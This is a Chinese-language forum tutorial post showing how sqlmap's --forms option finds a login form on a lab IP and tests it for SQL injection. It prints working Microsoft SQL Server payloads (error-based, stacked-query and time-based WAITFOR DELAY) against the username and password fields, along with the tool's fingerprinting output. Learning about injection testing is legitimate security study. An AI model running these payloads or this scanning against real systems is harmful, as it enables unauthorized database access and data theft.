切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
282 Sqlmap : auto scanner form[复制链接]
发表于 2012-10-7 20:28:40 | 显示全部楼层 |!read_mode!
自动寻找FORM表单提交
例子:
  1. root@Dis9Team:/tmp# GET http://5.5.5.3/index.htm
  2. <form name="frmLogin" action="post.asp" method="post">
  3. Username: <input type="text" name="userName">
  4. Password: <input type="text" name="password"><input type="submit"></form>
复制代码

关键字:form
  1. root@Dis9Team:~# sqlmap -u "http://5.5.5.3/index.htm" --forms
  2. [#1] form:
  3. POST http://5.5.5.3:80/post.asp
  4. POST data: userName=&password=
  5. do you want to test this form? [Y/n/q]
  6. >
复制代码

注意 如果一个页面有多个form注意选择  [#1] form:
POST http://5.5.5.3:80/post.asp #POST提交到 post.asp
POST data: userName=&password=  # post数据
  1. Y
  2. Edit POST data [default: userName=&password=] (Warning: blank fields detected):
  3. do you want to fill blank fields with random values? [Y/n] Y
  4. [00:05:28] [INFO] resuming back-end DBMS 'microsoft sql server'
  5. [00:05:28] [INFO] using '/pen/sql/sqlmap/output/results-09112012_1205am.csv' as results file
  6. [00:05:28] [INFO] heuristics detected web page charset 'ascii'
  7. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  8. ---
  9. Place: POST
  10. Parameter: password
  11.     Type: error-based
  12.     Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
  13.     Payload: userName=1234567&password=123456' AND 2231=CONVERT(INT,(CHAR(58)+CHAR(115)+CHAR(115)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (2231=2231) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(108)+CHAR(110)+CHAR(103)+CHAR(58))) AND 'FpCN'='FpCN

  14.     Type: stacked queries
  15.     Title: Microsoft SQL Server/Sybase stacked queries
  16.     Payload: userName=1234567&password=123456'; WAITFOR DELAY '0:0:5';--

  17.     Type: AND/OR time-based blind
  18.     Title: Microsoft SQL Server/Sybase time-based blind
  19.     Payload: userName=1234567&password=123456' WAITFOR DELAY '0:0:5'--

  20. Place: POST
  21. Parameter: userName
  22.     Type: error-based
  23.     Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
  24.     Payload: userName=1234567' AND 5821=CONVERT(INT,(CHAR(58)+CHAR(115)+CHAR(115)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (5821=5821) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(108)+CHAR(110)+CHAR(103)+CHAR(58))) AND 'Wdrp'='Wdrp&password=123456

  25.     Type: stacked queries
  26.     Title: Microsoft SQL Server/Sybase stacked queries
  27.     Payload: userName=1234567'; WAITFOR DELAY '0:0:5';--&password=123456

  28.     Type: AND/OR time-based blind
  29.     Title: Microsoft SQL Server/Sybase time-based blind
  30.     Payload: userName=1234567' WAITFOR DELAY '0:0:5'--&password=123456
  31. ---
  32. there were multiple injection points, please select the one to use for following injections:
  33. [0] place: POST, parameter: userName, type: Single quoted string (default)
  34. [1] place: POST, parameter: password, type: Single quoted string
  35. [q] Quit
  36. > 0
  37. do you want to exploit this SQL injection? [Y/n] Y
  38. [00:05:32] [INFO] the back-end DBMS is Microsoft SQL Server
  39. web server operating system: Windows 2003
  40. web application technology: ASP.NET, Microsoft IIS 6.0, ASP
  41. back-end DBMS: Microsoft SQL Server 2000
  42. [00:05:32] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/pen/sql/sqlmap/output/results-09112012_1205am.csv'
复制代码




操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-1 05:57

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部